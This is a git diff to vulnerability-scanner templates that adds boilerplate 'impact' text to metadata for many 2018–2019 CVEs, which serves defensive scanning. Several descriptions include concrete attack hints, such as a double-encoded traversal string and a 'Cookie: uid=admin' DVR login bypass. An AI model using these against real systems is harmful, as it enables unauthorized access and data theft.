b/http/cves/2018/CVE-2018-2894.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS - Web Services) is susceptible to a remote code execution vulnerability that is easily exploitable and could allow unauthenticated attackers with network access via HTTP to compromise the server. Supported versions that are affected are 12.1.3.0, 12.2.1.2 and 12.2.1.3. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-3167.yaml b/http/cves/2018/CVE-2018-3167.yaml index 155180cdf3..fdb62d57fe 100644 --- a/http/cves/2018/CVE-2018-3167.yaml +++ b/http/cves/2018/CVE-2018-3167.yaml @@ -5,6 +5,8 @@ info: author: geeknik severity: medium description: Oracle E-Business Suite, Application Management Pack component (User Monitoring subcomponent), is susceptible to blind server-side request forgery. An attacker with network access via HTTP can gain read access to a subset of data, connect to internal services like HTTP-enabled databases, or perform post requests towards internal services which are not intended to be exposed. Affected supported versions are 12.1.3, 12.2.3, 12.2.4, 12.2.5, 12.2.6, and 12.2.7. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass network restrictions and access internal resources. remediation: | Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-3238.yaml b/http/cves/2018/CVE-2018-3238.yaml index 08a4134021..0f28e71dc1 100644 --- a/http/cves/2018/CVE-2018-3238.yaml +++ b/http/cves/2018/CVE-2018-3238.yaml 
@@ -5,6 +5,8 @@ info: author: leovalcante severity: medium description: The Oracle WebCenter Sites 11.1.1.8.0 component of Oracle Fusion Middleware is impacted by easily exploitable cross-site scripting vulnerabilities that allow high privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest patches and updates provided by Oracle to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-3714.yaml b/http/cves/2018/CVE-2018-3714.yaml index a3998b8bfb..ffd3e4576b 100644 --- a/http/cves/2018/CVE-2018-3714.yaml +++ b/http/cves/2018/CVE-2018-3714.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: medium description: node-srv is vulnerable to local file inclusion due to lack of url validation, which allows a malicious user to read content of any file with known path. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the node-srv application. reference: diff --git a/http/cves/2018/CVE-2018-3760.yaml b/http/cves/2018/CVE-2018-3760.yaml index 364fd0adf1..352bafd846 100644 --- a/http/cves/2018/CVE-2018-3760.yaml +++ b/http/cves/2018/CVE-2018-3760.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Ruby On Rails is vulnerable to local file inclusion caused by secondary decoding in Sprockets 3.7.1 and lower versions. An attacker can use %252e%252e/ to access the root directory and read or execute any file on the target server. + impact: | + This vulnerability can lead to unauthorized access to sensitive files and information stored on the server. remediation: | Apply the latest security patches and updates for Ruby On Rails framework to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-3810.yaml b/http/cves/2018/CVE-2018-3810.yaml index 6015f58d35..195b21a579 100644 --- a/http/cves/2018/CVE-2018-3810.yaml +++ b/http/cves/2018/CVE-2018-3810.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Oturia Smart Google Code Inserter plugin before 3.5 for WordPress allows unauthenticated attackers to insert arbitrary JavaScript or HTML code (via the sgcgoogleanalytic parameter) that runs on all pages served by WordPress. The saveGoogleCode() function in smartgooglecode.php does not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the inserted code. + impact: | + An attacker can bypass authentication and gain unauthorized access to the affected WordPress site. remediation: | Update to the latest version of the Oturia WordPress Smart Google Code Inserter plugin (3.5 or higher) to fix the authentication bypass vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-5230.yaml b/http/cves/2018/CVE-2018-5230.yaml index 0b1fb91c96..1d63d30ec1 100644 --- a/http/cves/2018/CVE-2018-5230.yaml +++ b/http/cves/2018/CVE-2018-5230.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Atlassian Jira Confluence before version 7.6.6, from version 7.7.0 before version 7.7.4, from version 7.8.0 before version 7.8.4, and from version 7.9.0 before version 7.9.2, allows remote attackers to inject arbitrary HTML or JavaScript via a cross-site scripting vulnerability in the error message of custom fields when an invalid value is specified. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, data theft, or other malicious activities. remediation: | Apply the latest security patches or updates provided by Atlassian to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-5316.yaml b/http/cves/2018/CVE-2018-5316.yaml index 7cd3557aab..edda5b7948 100644 --- a/http/cves/2018/CVE-2018-5316.yaml +++ b/http/cves/2018/CVE-2018-5316.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress SagePay Server Gateway for WooCommerce before 1.0.9 is vulnerable to cross-site scripting via the includes/pages/redirect.php page parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress SagePay Server Gateway for WooCommerce plugin (1.0.9 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-5715.yaml b/http/cves/2018/CVE-2018-5715.yaml index 4838050190..d5b92650e4 100644 --- a/http/cves/2018/CVE-2018-5715.yaml +++ b/http/cves/2018/CVE-2018-5715.yaml 
@@ -5,6 +5,8 @@ info: author: edoardottt severity: medium description: SugarCRM 3.5.1 is vulnerable to cross-site scripting via phprint.php and a parameter name in the query string (aka a $key variable). + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of SugarCRM or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2018/CVE-2018-6008.yaml b/http/cves/2018/CVE-2018-6008.yaml index 3ebfdbd1d3..ea99700b92 100644 --- a/http/cves/2018/CVE-2018-6008.yaml +++ b/http/cves/2018/CVE-2018-6008.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: high description: Joomla! Jtag Members Directory 5.3.7 is vulnerable to local file inclusion via the download_file parameter. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system. remediation: | Update Joomla! Jtag Members Directory to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-6184.yaml b/http/cves/2018/CVE-2018-6184.yaml index 51685d4f02..e64488abae 100644 --- a/http/cves/2018/CVE-2018-6184.yaml +++ b/http/cves/2018/CVE-2018-6184.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Zeit Next.js before 4.2.3 is susceptible to local file inclusion under the /_next request namespace. An attacker can obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Upgrade to the latest version of Zeit Next.js (>=4.2.3) to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-6200.yaml b/http/cves/2018/CVE-2018-6200.yaml index 7202a33a02..245a5bbf3f 100644 --- a/http/cves/2018/CVE-2018-6200.yaml +++ b/http/cves/2018/CVE-2018-6200.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Apply the latest security patches and updates provided by vBulletin to fix the open redirect vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-6530.yaml b/http/cves/2018/CVE-2018-6530.yaml index a7cc520681..2038f5c5c0 100644 --- a/http/cves/2018/CVE-2018-6530.yaml +++ b/http/cves/2018/CVE-2018-6530.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter. + impact: | + Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected device. remediation: | Apply the latest firmware update provided by D-Link to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-6910.yaml b/http/cves/2018/CVE-2018-6910.yaml index 920a4ac028..93bae2cb30 100644 --- a/http/cves/2018/CVE-2018-6910.yaml +++ b/http/cves/2018/CVE-2018-6910.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: high description: DedeCMS 5.7 allows remote attackers to discover the full path via a direct request for include/downmix.inc.php or inc/inc_archives_functions.php + impact: | + An attacker can use the disclosed path information to gather intelligence for further attacks or exploit other vulnerabilities. remediation: | Apply the latest patch or upgrade to a newer version of DedeCMS to fix the path disclosure vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-7251.yaml b/http/cves/2018/CVE-2018-7251.yaml index ffcde7f0b8..2b975b3eac 100644 --- a/http/cves/2018/CVE-2018-7251.yaml +++ b/http/cves/2018/CVE-2018-7251.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred. + impact: | + An attacker can gain access to sensitive information, such as usernames, passwords, and system configuration details. remediation: | Upgrade to the latest version of Anchor CMS or apply the necessary patches to fix the error log exposure vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml index c102ed681b..1ed784852b 100644 --- a/http/cves/2018/CVE-2018-7422.yaml +++ b/http/cves/2018/CVE-2018-7422.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive files, potentially leading to further compromise of the system. remediation: | Update WordPress Site Editor plugin to the latest version to mitigate the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-7467.yaml b/http/cves/2018/CVE-2018-7467.yaml index b48bb98918..a9adada938 100644 --- a/http/cves/2018/CVE-2018-7467.yaml +++ b/http/cves/2018/CVE-2018-7467.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: AxxonSoft Axxon Next suffers from a local file inclusion vulnerability. + impact: | + An attacker can read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Apply the latest security patches or updates provided by AxxonSoft to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-7490.yaml b/http/cves/2018/CVE-2018-7490.yaml index cdd2ec627d..ede381da41 100644 
--- a/http/cves/2018/CVE-2018-7490.yaml +++ b/http/cves/2018/CVE-2018-7490.yaml @@ -5,6 +5,8 @@ info: author: madrobot severity: high description: uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Update to the latest version of uWSGI PHP Plugin or apply the necessary patches to fix the local file inclusion vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml index 5b9652b300..f34e52d32a 100644 --- a/http/cves/2018/CVE-2018-7600.yaml +++ b/http/cves/2018/CVE-2018-7600.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. + impact: | + Critical remediation: | Upgrade to the latest version of Drupal or apply the official patch provided by Drupal security team. reference: diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index 719a62f934..20fa14ee52 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml 
@@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. + impact: | + Remote attackers can execute arbitrary code on the affected Drupal installations. remediation: | Upgrade to Drupal 7.58, 8.3.9, 8.4.6, or 8.5.1 or apply the necessary patches provided by Drupal. reference: diff --git a/http/cves/2018/CVE-2018-7662.yaml b/http/cves/2018/CVE-2018-7662.yaml index d48712c65a..45a614a903 100644 --- a/http/cves/2018/CVE-2018-7662.yaml +++ b/http/cves/2018/CVE-2018-7662.yaml @@ -5,6 +5,8 @@ info: author: ritikchaddha severity: medium description: CouchCMS <= 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php. + impact: | + An attacker can exploit this vulnerability to gain knowledge of the server's directory structure, potentially aiding in further attacks. remediation: | Upgrade to the latest version of CouchCMS (2.1 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index 7404528811..a530e3c677 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code. + impact: | + Successful exploitation of these vulnerabilities can lead to unauthorized actions performed on behalf of the user and execution of arbitrary code. remediation: | Apply the latest security patches and update to a newer version of DedeCMS. reference: diff --git a/http/cves/2018/CVE-2018-7719.yaml b/http/cves/2018/CVE-2018-7719.yaml index 1f965478a7..c702ae6fe0 100644 --- a/http/cves/2018/CVE-2018-7719.yaml +++ b/http/cves/2018/CVE-2018-7719.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive files on the server, potentially leading to further compromise of the system. remediation: | Upgrade Acrolinx Server to version 5.2.5 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml index 4662ee2398..820f982409 100644 --- a/http/cves/2018/CVE-2018-8006.yaml +++ b/http/cves/2018/CVE-2018-8006.yaml 
@@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apache ActiveMQ versions 5.0.0 to 5.15.5 are vulnerable to cross-site scripting via the web based administration console on the queue.jsp page. The root cause of this issue is improper data filtering of the QueueFilter parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Apache ActiveMQ to a version higher than 5.15.5 or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index 7da175bf75..757106136b 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Apache OFBiz 16.11.04 is susceptible to XML external entity injection (XXE injection). + impact: | + Successful exploitation of this vulnerability could lead to information disclosure, denial of service. remediation: | Apply the necessary patches or upgrade to a non-vulnerable version of Apache OFBiz. reference: diff --git a/http/cves/2018/CVE-2018-8715.yaml b/http/cves/2018/CVE-2018-8715.yaml index 6dd4ddc8f7..a1877e5484 100644 --- a/http/cves/2018/CVE-2018-8715.yaml +++ b/http/cves/2018/CVE-2018-8715.yaml 
@@ -5,6 +5,8 @@ info: author: milo2012 severity: high description: The Embedthis HTTP library, and Appweb versions before 7.0.3, have a logic flaw related to the authCondition function in http/httpLib.c. With a forged HTTP request, it is possible to bypass authentication for the form and digest login types. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the application. remediation: | Apply the necessary patches or updates provided by the vendor to fix the authentication bypass vulnerability in AppWeb. reference: diff --git a/http/cves/2018/CVE-2018-8719.yaml b/http/cves/2018/CVE-2018-8719.yaml index 612c11cad1..b75ba13f4e 100644 --- a/http/cves/2018/CVE-2018-8719.yaml +++ b/http/cves/2018/CVE-2018-8719.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress WP Security Audit Log 3.1.1 plugin is susceptible to information disclosure. Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information from the WordPress WP Security Audit Log plugin. remediation: | Update to the latest version of WordPress WP Security Audit Log plugin (3.1.2 or higher) to fix the information disclosure vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-8727.yaml b/http/cves/2018/CVE-2018-8727.yaml index d182ecb9e9..a5de2ea375 100644 --- a/http/cves/2018/CVE-2018-8727.yaml +++ b/http/cves/2018/CVE-2018-8727.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Mirasys DVMS Workstation versions 5.12.6 and prior suffer from local file inclusion vulnerabilities. + impact: | + An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system. remediation: | Upgrade to a patched version of Mirasys DVMS Workstation (>=5.12.7) to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2018/CVE-2018-8770.yaml b/http/cves/2018/CVE-2018-8770.yaml index 9ae5a4a9a3..e74cba4a3c 100644 --- a/http/cves/2018/CVE-2018-8770.yaml +++ b/http/cves/2018/CVE-2018-8770.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: medium description: Cobub Razor 0.8.0 is susceptible to information disclosure via generate.php, controllers/getConfigTest.php, controllers/getUpdateTest.php, controllers/postclientdataTest.php, controllers/posterrorTest.php, controllers/posteventTest.php, controllers/posttagTest.php, controllers/postusinglogTest.php, fixtures/Controller_fixt.php, fixtures/Controller_fixt2.php, fixtures/view_fixt2.php, libs/ipTest.php, or models/commonDbfix.php. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information. remediation: | Upgrade to a patched version of Cobub Razor. reference: diff --git a/http/cves/2018/CVE-2018-9118.yaml b/http/cves/2018/CVE-2018-9118.yaml index 7474abbc50..2d874a5d45 100644 --- a/http/cves/2018/CVE-2018-9118.yaml +++ b/http/cves/2018/CVE-2018-9118.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | WordPress 99 Robots WP Background Takeover Advertisements 4.1.4 is susceptible to local file inclusion via exports/download.php. + impact: | + This vulnerability can lead to unauthorized access to sensitive files on the server, potentially exposing sensitive information or allowing for further exploitation. remediation: | Upgrade to 4.1.15. reference: diff --git a/http/cves/2018/CVE-2018-9161.yaml b/http/cves/2018/CVE-2018-9161.yaml index f5ea19bd11..1bcf8bca50 100644 --- a/http/cves/2018/CVE-2018-9161.yaml +++ b/http/cves/2018/CVE-2018-9161.yaml @@ -5,6 +5,8 @@ info: author: gy741 severity: critical description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. + impact: | + An attacker could gain unauthorized access to the application and potentially compromise user accounts and sensitive data. remediation: | Ensure that sensitive credentials are properly protected and not exposed in the application's source code or configuration files. reference: diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml index 58ed8b2179..84a5ec0375 100644 --- a/http/cves/2018/CVE-2018-9845.yaml +++ b/http/cves/2018/CVE-2018-9845.yaml @@ -5,6 +5,8 @@ info: author: philippedelteil severity: critical description: Etherpad Lite before 1.6.4 is exploitable for admin access. + impact: | + An attacker can bypass the admin authentication and gain unauthorized access to the admin panel. remediation: | Upgrade to Etherpad Lite version 1.6.4 or later to fix the vulnerability. reference: 
diff --git a/http/cves/2018/CVE-2018-9995.yaml b/http/cves/2018/CVE-2018-9995.yaml index 3ab43f3cde..e39767d13a 100644 --- a/http/cves/2018/CVE-2018-9995.yaml +++ b/http/cves/2018/CVE-2018-9995.yaml @@ -8,6 +8,8 @@ info: TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass authentication via a "Cookie: uid=admin" header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response. + impact: | + An attacker can bypass authentication and gain unauthorized access to the device, potentially leading to unauthorized configuration changes or data exfiltration. remediation: | Apply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability and ensure strong and unique passwords are used for device access. reference: diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index aa2e733792..81ad15c1d9 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | Apache Solr is vulnerable to remote code execution vulnerabilities via the DataImportHandler, an optional but popular module to pull in data from databases and other sources. The module has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary commands on the affected system. remediation: | Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true. reference: diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index cc0f48997b..ce4646a165 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are vulnerable to cross-site scripting because the SSI printenv command echoes user provided data without escaping. Note: SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the necessary patches or updates provided by Apache Tomcat to fix the XSS vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index e7961787cc..ff04836531 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml 
@@ -5,6 +5,8 @@ info: author: geeknik severity: critical description: Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation when evaluated on raw user input in tag attributes, which may lead to remote code execution. + impact: | + Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the affected server. remediation: | Upgrade Apache Struts to a version higher than 2.5.20 or apply the necessary patches provided by the vendor. reference: diff --git a/http/cves/2019/CVE-2019-10068.yaml b/http/cves/2019/CVE-2019-10068.yaml index 40815b1fd2..e1878aa02d 100644 --- a/http/cves/2019/CVE-2019-10068.yaml +++ b/http/cves/2019/CVE-2019-10068.yaml @@ -5,6 +5,8 @@ info: author: davidmckennirey severity: critical description: Kentico CMS is susceptible to remote code execution via a .NET deserialization vulnerability. + impact: | + Successful exploitation of this vulnerability can result in remote code execution, allowing an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches and updates provided by Kentico CMS to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 609742f9a9..4f4f6322d9 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml 
@@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Apache HTTP Server versions 2.4.0 through 2.4.39 are vulnerable to a limited cross-site scripting issue affecting the mod_proxy error page. An attacker could cause the link on the error page to be malformed and instead point to a page of their choice. This would only be exploitable where a server was set up with proxying enabled but was misconfigured in such a way that the Proxy Error page was displayed. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious HTML code or execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to Apache HTTP Server version 2.4.40 or later, which includes a fix for this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index a68325b085..a01a821762 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Upgrade Apache HTTP server to version 2.4.40 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-1010287.yaml b/http/cves/2019/CVE-2019-1010287.yaml index 446f68d13b..fb5da59779 100644 --- a/http/cves/2019/CVE-2019-1010287.yaml +++ b/http/cves/2019/CVE-2019-1010287.yaml 
@@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: 'Timesheet Next Gen 1.5.3 and earlier is vulnerable to cross-site scripting that allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.' + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of Timesheet Next Gen (1.5.4 or above) that properly sanitizes user input to prevent XSS attacks. reference: diff --git a/http/cves/2019/CVE-2019-1010290.yaml b/http/cves/2019/CVE-2019-1010290.yaml index 395a9d7f07..a0da269df3 100644 --- a/http/cves/2019/CVE-2019-1010290.yaml +++ b/http/cves/2019/CVE-2019-1010290.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Babel contains an open redirect vulnerability via redirect.php in the newurl parameter. An attacker can use any legitimate site using Babel to redirect user to a malicious site, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks. remediation: | Upgrade to Babel version 7.4.0 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-10232.yaml b/http/cves/2019/CVE-2019-10232.yaml index 8e9add1cbb..16565a51cd 100644 --- a/http/cves/2019/CVE-2019-10232.yaml +++ b/http/cves/2019/CVE-2019-10232.yaml 
@@ -5,6 +5,8 @@ info: author: RedTeamBrasil severity: critical description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to a patched version of Teclib GLPI (9.3.4 or later) to mitigate this vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index 4d01e7d565..3ca1060898 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -5,6 +5,8 @@ info: author: c-sh0 severity: medium description: Jenkins through 2.196, LTS 2.176.3 and earlier prints the value of the cookie on the /whoAmI/ URL despite it being marked HttpOnly, thus making it possible to steal cookie-based authentication credentials if the URL is exposed or accessed via another cross-site scripting issue. + impact: | + The exposure of cookies can lead to session hijacking, unauthorized access, and potential data breaches. remediation: | Upgrade Jenkins to a version higher than 2.196 to mitigate the vulnerability. reference: diff --git a/http/cves/2019/CVE-2019-10475.yaml b/http/cves/2019/CVE-2019-10475.yaml index 78346a1033..fd7005c75b 100644 --- a/http/cves/2019/CVE-2019-10475.yaml +++ b/http/cves/2019/CVE-2019-10475.yaml 
